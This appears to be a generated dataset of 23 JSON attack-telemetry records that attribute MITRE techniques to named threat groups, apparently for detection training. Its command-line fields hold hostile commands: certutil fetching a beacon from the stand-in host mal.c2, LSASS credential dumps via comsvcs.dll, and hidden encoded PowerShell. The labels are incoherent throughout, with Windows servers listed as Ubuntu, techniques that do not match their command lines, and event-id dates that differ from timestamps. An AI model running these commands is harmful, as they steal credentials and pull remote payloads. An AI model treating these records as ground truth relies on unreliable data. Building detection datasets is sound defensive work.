text stringlengths 1.13k 1.33k |
|---|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance","Defense Evasion","Collection"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20250314T000837000Z_0018201","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.218.249.40","name":"APP-WEB-6NKYWX7749","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18201UNC4841T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.8.45.117","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-07-18T21:36:19.000Z","user":{"name":"svc_lbbv1ixrbr2m","sid":"S-1-5-21-991407866-194928396-8978"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence","Reconnaissance","Execution"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20260921T003457000Z_0018203","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.23.144.62","name":"WIN-FIN-SRV-5W6P731YN0","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18203Volt TyphoonT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.1.35.107","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-29T07:27:49.000Z","user":{"name":"azuread\\ztke9x0ynrsa","sid":"S-1-5-21-959461118-947614091-1620"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Privilege Escalation","Impact"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20260710T155742000Z_0018205","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.36.124.48","name":"EC2-INST-JN3KKXEDT5","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18205Mustang PandaT1071.001"},"network":{"domain":"github.com","dst_ip":"1.79.12.231","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2934 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-02-22T09:07:45.000Z","user":{"name":"CORP\\uybbxtlr6n57","sid":"S-1-5-21-574757624-121212900-9142"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection","Discovery"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20250722T101259000Z_0018207","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.29.229.2","name":"APP-WEB-BW6OHCLMF5","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18207Mustang PandaT1003.001"},"network":{"domain":"github.com","dst_ip":"1.135.215.152","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2147 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-07-27T06:31:20.000Z","user":{"name":"arn:aws:iam::bdq8fo01fba8","sid":"S-1-5-21-483384489-673254095-5300"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20260326T135729000Z_0018209","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.216.251.223","name":"APP-WEB-GXLCFDIA0Y","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18209APT41T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.10.59.232","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2476 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-08T01:49:25.000Z","user":{"name":"arn:aws:iam::2ebvfkmb1o8t","sid":"S-1-5-21-147226555-772745127-8224"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20250530T165150000Z_0018211","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.103.50.11","name":"AZURE-VM-CAB94RRY4R","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18211Mustang PandaT1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.175.48.92","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3760 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-07-09T15:09:25.000Z","user":{"name":"CORP\\wkc5c2m7rynu","sid":"S-1-5-21-710182002-389073778-3586"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Credential Access","Collection"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250323T094321000Z_0018213","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.33.156.81","name":"DB-ORACLE-Y97OFF0YR1","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18213APT41T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.105.92.150","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2935 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-09-05T03:04:12.000Z","user":{"name":"svc_751jjururpnz","sid":"S-1-5-21-569643669-631308478-9296"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Discovery","Execution"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20250716T222215000Z_0018215","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.46.74.69","name":"DB-ORACLE-IXKU9HNSYI","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18215Scattered SpiderT1531"},"network":{"domain":"github.com","dst_ip":"1.153.128.242","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-29T06:14:05.000Z","user":{"name":"azuread\\h3z5lcavtlk3","sid":"S-1-5-21-527444864-609129014-3416"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Impact","Persistence","Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20250206T174726000Z_0018217","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.206.134.103","name":"APP-WEB-OCL14T2FJ9","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18217Mustang PandaT1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.101.190.254","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-12T16:04:41.000Z","user":{"name":"arn:aws:iam::noan4ek6tad9","sid":"S-1-5-21-443949538-869845195-7946"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion","Collection","Lateral Movement"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20260212T093913000Z_0018219","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.147.128.108","name":"DB-ORACLE-JMQP3HBJ52","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18219Volt TyphoonT1546.003"},"network":{"domain":"github.com","dst_ip":"1.150.65.64","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-04-23T19:25:02.000Z","user":{"name":"azuread\\vy81zqupabdu","sid":"S-1-5-21-124524198-767899035-7521"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Credential Access","Execution","Impact"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20260210T100010000Z_0018221","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.81.62.15","name":"WIN-FIN-SRV-SXVVZ5PCDL","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18221Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.123.102.87","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-10-04T10:57:56.000Z","user":{"name":"azuread\\5q9lodnti2fo","sid":"S-1-5-21-750092397-138335025-7360"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Execution","Lateral Movement","Command and Control"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20260420T104639000Z_0018223","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.59.165.42","name":"DB-ORACLE-AKQNS0IPFK","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18223Mustang PandaT1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.187.158.199","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-05-19T21:06:40.000Z","user":{"name":"azuread\\ytgkfh7zftok","sid":"S-1-5-21-578958099-296476539-8277"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration","Command and Control","Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20260118T221421000Z_0018225","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.63.141.137","name":"IAM-ROLE-KMORR9MMHK","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18225Scattered SpiderT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.39.0.60","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-18T10:39:51.000Z","user":{"name":"azuread\\xf732u8zcmfh","sid":"S-1-5-21-887877476-403973103-7102"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Defense Evasion","Credential Access"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20260224T154337000Z_0018227","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.185.220.193","name":"AZURE-VM-FRS0PCEZI2","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18227Mustang PandaT1531"},"network":{"domain":"github.com","dst_ip":"1.88.55.227","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3041 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-15T23:28:59.000Z","user":{"name":"CORP\\ulmsfs6h33tl","sid":"S-1-5-21-997055475-376869653-2219"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20250314T185328000Z_0018229","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.169.23.181","name":"IAM-ROLE-ODAJDLXTE1","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18229Mustang PandaT1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.42.82.176","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-27T02:56:33.000Z","user":{"name":"arn:aws:iam::ztgarqpbq7ys","sid":"S-1-5-21-185278006-893235118-6472"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Defense Evasion"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20251118T143548000Z_0018231","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.42.80.101","name":"WIN-FIN-SRV-AERTEKEGIN","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18231UNC4841T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.95.22.145","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-04-21T23:32:36.000Z","user":{"name":"arn:aws:iam::583lj6pahe94","sid":"S-1-5-21-798414333-410109672-9229"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Execution","Defense Evasion"],"technique_id":"T1003.001"},"event_id":"evt_lapsus_20260312T181019000Z_0018233","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.114.71.103","name":"APP-WEB-1SXME3T9T7","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18233Lapsus$T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.115.119.50","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-04-07T03:34:45.000Z","user":{"name":"azuread\\m5dmaqkyz1b4","sid":"S-1-5-21-711984268-657644919-1557"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Execution","Credential Access"],"technique_id":"T1531"},"event_id":"evt_lapsus_20251221T140825000Z_0018235","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.22.250.25","name":"IAM-ROLE-BDHPRRV2H1","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18235Lapsus$T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.6.130.213","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-04-01T04:53:34.000Z","user":{"name":"CORP\\dvseeiah9ci2","sid":"S-1-5-21-449147856-707387328-5334"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Discovery","Initial Access"],"technique_id":"T1531"},"event_id":"evt_lapsus_20260626T030147000Z_0018237","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.165.242.62","name":"APP-WEB-I9AYMD8RRI","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18237Lapsus$T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.14.120.158","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2726 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-31T19:07:31.000Z","user":{"name":"CORP\\6p57t8juygc4","sid":"S-1-5-21-226056057-354313067-6779"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Command and Control"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20250908T050102000Z_0018239","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.123.88.229","name":"EC2-INST-Z4APCF1GRT","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18239APT41T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.39.20.61","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-02T09:36:18.000Z","user":{"name":"arn:aws:iam::3hz65iyvmoh5","sid":"S-1-5-21-835798389-141878726-4639"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20250205T173123000Z_0018241","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.116.83.222","name":"AZURE-VM-0F96IOZXBW","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18241Mustang PandaT1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.121.63.15","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-18T07:54:18.000Z","user":{"name":"svc_xoqlcbjj93nr","sid":"S-1-5-21-607856675-513048038-2657"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Collection"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20260623T074250000Z_0018243","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.142.195.32","name":"DB-ORACLE-KTGWI7NYMX","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18243UNC4841T1484.001"},"network":{"domain":"github.com","dst_ip":"1.93.92.174","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1323 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-01-09T14:28:00.000Z","user":{"name":"CORP\\jqtsymjr623o","sid":"S-1-5-21-683642379-338485593-8205"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250809T024223000Z_0018245","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.36.221.186","name":"AZURE-VM-5JLNU7TIDA","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18245Lapsus$T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.183.194.224","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-02-14T03:07:14.000Z","user":{"name":"i-gnzr169e4hsk","sid":"S-1-5-21-487862598-125166277-4568"}} |
